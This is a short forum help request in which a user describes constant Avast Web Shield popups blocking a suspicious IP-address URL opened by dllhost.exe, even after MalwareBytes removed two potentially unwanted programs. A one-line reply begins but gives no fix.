Avast Web Shield has blocked a harmful webpage or file

Hello,

I keep getting the “Avast Web Shield has blocked a harmful webpage or file” popup. It is almost constant.
For Example:
URL: http://31.184.194.37/query?version=1.7&sid=1102&builddate=311214&q=supplements+for
Process: C:/windows\syswow64\dllhost.exe

Avast doesn’t find anything wrong when it scans.
I ran MalwareBytes and it found two PUPs and quarantined them but the popups continue.

Could somebody please help me solve this problem?
Thank You!

This should stop it
